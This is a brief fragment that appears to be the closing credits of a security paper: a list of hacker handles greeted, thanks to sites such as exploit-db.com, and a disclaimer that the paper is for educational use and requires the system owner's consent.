Greetz	    : ZeQ3uL, JabAv0C, p3lo, Sh0ck, BAD $ectors, Snapter, Conan, Win7dos, Gdiupo, GnuKDE, JK
Special Thx : asylu3, str0ke, citec.us, exploit-db.com

				----------------------------------------------------
	This paper is written for Educational purpose only. The authors are not responsible for any damage 
 originating from using this paper in wrong objective. If you want to use this knowledge with other person systems, 
				you must request for consent from system owner before
				----------------------------------------------------